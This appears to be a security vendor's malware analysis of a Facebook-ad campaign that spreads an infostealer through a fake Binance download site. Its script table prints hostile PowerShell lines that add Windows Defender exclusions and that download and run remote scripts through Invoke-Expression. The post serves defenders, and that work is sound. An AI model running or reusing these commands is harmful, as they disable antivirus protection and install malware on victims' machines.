Malware Disguised as A Cryptocurrency Exchange Being Distributed Through Facebook Ads
AhnLab SEcurity intelligence Center (ASEC) has identified malware being distributed through Facebook ads targeting cryptocurrency users. The identified malware is disguised as a specific cryptocurrency exchange to prompt users to install the malicious program. When users download a file from the disguised website, a file named “installer.msi” is saved and installed. During the installation process, the malware communicates with a JavaScript loaded on the disguised website, which ultimately executes an Infostealer that collects system information, screen captures, and browser information.
Figure 1. Fake advertisements
This post is based on a website disguised as Binance. When a user clicks the “Learn More” or “Download” button in the Facebook ad, they are redirected to the disguised website. However, if the user is not logged into Facebook or the URL does not contain parameters such as “utm_campaign, utm_content, cid, bid, fbclid, fbid,” they are redirected to an unrelated website. If the conditions are met and the user is redirected to the disguised website, they are prompted to download a malicious file by clicking the download button for Windows on the main screen.
Figure 2. Website disguised as Binance installation page
When the user clicks the button, a file named “installer.msi” is downloaded. Upon installing this file, a specific port (30303) on the local host is opened in the listening state. Afterward, the disguised website attempts to establish a connection with the system through this port and begins to communicate with it. Different commands are executed according to the parameters. The features of each parameter are shown in Table 1 below.
| Parameter | Function |
|---|---|
| /file | Downloaded a file named installer.msi |
| /r | Query GUID in a specific registry |
| /w | Query system information using WMI queries |
| /worker | Scheduler response in XML format |
Table 1. Functions by Parameter
Figure 3. Part of the JavaScript code loaded on the fake website
When the threat actor sends the GUID of the victim’s system to the threat actor’s server through the “/r” parameter, the server responds with a WMI query that retrieves system information. The victim’s PC receives this response and uses the WMI query to collect system information. It then uses the “/worker” parameter to send this information back to the threat actor’s server. If the victim’s system is a virtual environment, the server returns a NULL value and the communication ends. If the system is not a virtual environment, the server responds with an XML-formatted scheduler file that executes the PowerShell scheduler.
Figure 4. (Top) When the scheduler is unresponsive (virtual environment) (Bottom) When the scheduler is responsive (non-virtual environment)
When a scheduler is registered, events in the “Application” log trigger the execution of a PowerShell script encoded in BASE64. The following table provides details about the executed script.
| ID | Script | Description |
|---|---|---|
| 1 |
Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName -Force |
Adds PowerShell process to Windows Defender scan exception |
| 2 |
Add-MpPreference -ExclusionPath (Get-Location) -Force |
Adds the script path executed by PowerShell to Windows Defender scan exclusions |
| 3 |
Invoke-WebRequest -UseBasicParsing Domain?OSSoftwareInstallerLegacy | Invoke-Expression |
Downloads and executes additional scripts from a specific domain |
| 4 |
Invoke-WebRequest -UseBasicParsing Domain?OSSoftwareInstallerLegacy | Invoke-Expression |
Downloads and executes additional scripts from a specific domain |
Table 2. Features of each script
Figure 5. Registered scheduler
When the script in either step 3 or 4 of Table 2 is executed, an additional PowerShell script is downloaded and executed from an external source. The downloaded script then downloads and executes additional scripts from an external source, as shown in Figure 6.
Figure 6. PowerShell script downloading additional scripts
This attack targets users interested in cryptocurrency and is distributed through advertisements. The attack has been covered by Bitdefender and WithSecure, two global security companies. The malware ultimately executed collects browser and Telegram information and performs various malicious behaviors such as keylogging. Users are advised to check the domain of the website when downloading files to ensure that it is the official website. Most files distributed through advertisements are potentially unwanted programs (PUPs) or malware, so users should avoid downloading them.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
